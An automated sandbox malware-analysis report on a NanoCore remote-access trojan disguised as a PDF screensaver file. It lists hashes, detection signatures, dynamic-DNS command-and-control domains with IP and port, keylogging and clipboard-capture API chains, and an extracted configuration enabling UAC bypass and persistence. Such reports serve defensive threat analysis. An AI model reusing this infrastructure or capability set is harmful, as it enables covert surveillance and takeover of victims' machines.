Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Sample Name:	026910003102350.pdf.scr.exe
Analysis ID:	796783
MD5:	c2a80ccf6362bba805072de9ce963ea5
SHA1:	c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256:	592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Tags:	exe
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected AntiVM autoit script

Antivirus detection for URL or domain

Antivirus detection for dropped file

Yara detected Nanocore RAT

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Starts an encoded Visual Basic Script (VBE)

Creates multiple autostart registry keys

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Creates autostart registry keys with suspicious values (likely registry only malware)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Writes to foreign memory regions

Protects its processes via BreakOnTermination flag

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

OS version to string mapping found (often used in BOTs)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to execute programs as a different user

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Contains functionality to simulate mouse events

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: december2n.duckdns.org	Avira URL Cloud: Label: malware
Source: december2nd.ddns.net	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Avira: detection malicious, Label: DR/AutoIt.Gen

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Source: 026910003102350.pdf.scr.exe	ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe	Virustotal: Detection: 45%			Perma Link

Multi AV Scanner detection for domain / URL

Source: december2nd.ddns.net	Virustotal: Detection: 12%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 5%	Perma Link
Source: december2nd.ddns.net	Virustotal: Detection: 12%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

ReversingLabs: Detection: 46%

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.RegSvcs.exe.60b0000.7.unpack	Avira: Label: TR/NanoCore.fadte
Source: 19.2.RegSvcs.exe.d00000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Uses 32bit PE files

Source: 026910003102350.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 026910003102350.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CEB348 FindFirstFileExA,	0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,	2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034C642 FindFirstFileExW,	2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00387248 FindFirstFileW,FindClose,	2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037DB69

Networking

Uses dynamic DNS services

Source: unknown	DNS query: name: december2n.duckdns.org
Source: unknown	DNS query: name: december2nd.ddns.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: december2n.duckdns.org
Source: Malware configuration extractor	URLs: december2nd.ddns.net

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SPD-NETTR SPD-NETTR

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: december2n.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

2_2_0038D7A1

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

2_2_0037A54A

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

2_2_0038F45C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_0038F45C

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

2_2_003A9ED5

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
